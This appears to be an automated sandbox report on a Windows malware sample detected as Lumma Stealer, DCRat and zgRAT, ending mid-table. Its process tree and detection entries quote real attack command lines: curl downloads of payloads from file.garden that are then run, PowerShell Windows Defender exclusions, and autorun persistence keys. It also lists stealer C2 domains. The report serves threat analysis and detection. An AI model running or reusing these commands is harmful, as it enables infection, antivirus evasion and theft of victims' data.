Edit tour

Windows Analysis Report
4tXm5yPtiy.exe

Overview

General Information

Sample name:	4tXm5yPtiy.exe renamed because original name is a hash value
Original sample name:	a952acc41933fa2aa78ccc28f45c25928e1ef5c3b72ef3235b99c7bd79e9de40.exe
Analysis ID:	1522831
MD5:	cc9824f9940392c9172e05078982caab
SHA1:	0f4e458f24b461d3529ea30bbb1dbc30f8dbc1da
SHA256:	a952acc41933fa2aa78ccc28f45c25928e1ef5c3b72ef3235b99c7bd79e9de40
Tags:	exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious execution chain found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to resolve many domain names, but no domain seems valid

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Electron Application Child Processes

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

4tXm5yPtiy.exe (PID: 768 cmdline: "C:\Users\user\Desktop\4tXm5yPtiy.exe" MD5: CC9824F9940392C9172E05078982CAAB)

conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2056 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 2332 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

kdmapper.exe (PID: 2340 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)

wscript.exe (PID: 3032 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 4584 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

csc.exe (PID: 3344 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 2512 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 2916 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 3532 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5288 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 6708 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3828 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3660 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4884 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

msedge.exe (PID: 6872 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 2508 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 2976 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

physmeme.exe (PID: 3500 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)

conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 5652 cmdline: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 2616 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2108 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4536 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 3148 cmdline: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 3780 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1196 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7140 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 2940 cmdline: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 3848 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 1872 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 6892 cmdline: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 4648 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 4448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5308 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2556 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

msedge.exe (PID: 6324 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

wCnmgKwwXYQbWeNvWeCCOp.exe (PID: 3908 cmdline: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["tearrybyiwo.shop", "surveriysiop.shop", "tiddymarktwo.shop", "tendencerangej.shop", "fossillargeiw.shop", "appleboltelwk.shop", "coursedonnyre.shop", "captainynfanw.shop", "strappystyio.shop"], "Build id": "1AsNN2--5899070203"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Edge\msedge.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Edge\msedge.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000000.1650599430.0000000000C92000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.1706544888.00000000131A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: msedge.exe PID: 4584	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: msedge.exe PID: 6872	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
5.3.kdmapper.exe.66016cf.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.3.kdmapper.exe.66016cf.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.msedge.exe.c90000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.0.msedge.exe.c90000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.kdmapper.exe.66016cf.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.3.kdmapper.exe.66016cf.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.kdmapper.exe.65ff6cf.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.3.kdmapper.exe.65ff6cf.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.kdmapper.exe.65ff6cf.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.3.kdmapper.exe.65ff6cf.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 2916, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', ProcessId: 3532, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 4584, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wCnmgKwwXYQbWeNvWeCCOp

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 4584, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", ProcessId: 3344, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Electron Application Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', ProcessId: 3532, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\4tXm5yPtiy.exe", ParentImage: C:\Users\user\Desktop\4tXm5yPtiy.exe, ParentProcessId: 768, ParentProcessName: 4tXm5yPtiy.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, ProcessId: 2056, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 2340, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 3032, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 4584, TargetFilename: C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe', ProcessId: 3532, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4584, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline", ProcessId: 3344, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:36.659116+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49711	104.21.84.213	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:36.659116+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49711	104.21.84.213	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.053128+0200	2056036	1	Domain Observed Used for C2 Detected	192.168.2.8	57162	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.028835+0200	2056040	1	Domain Observed Used for C2 Detected	192.168.2.8	63708	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.091139+0200	2056042	1	Domain Observed Used for C2 Detected	192.168.2.8	64156	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)

